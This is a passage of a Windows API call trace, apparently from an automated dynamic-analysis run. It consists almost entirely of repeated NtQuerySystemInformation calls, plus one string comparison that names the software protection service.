SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0229.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x28, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0229.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf40, Length=0x20, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf40, Length=0x20, ResultLength=0x0) [0229.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a8, Length=0x50, ResultLength=0x0) [0229.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0229.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0229.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0229.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x28, ResultLength=0x0) [0229.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x28, ResultLength=0x0) [0229.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0229.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0229.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0229.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.459] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd338, Length=0x50, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0229.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 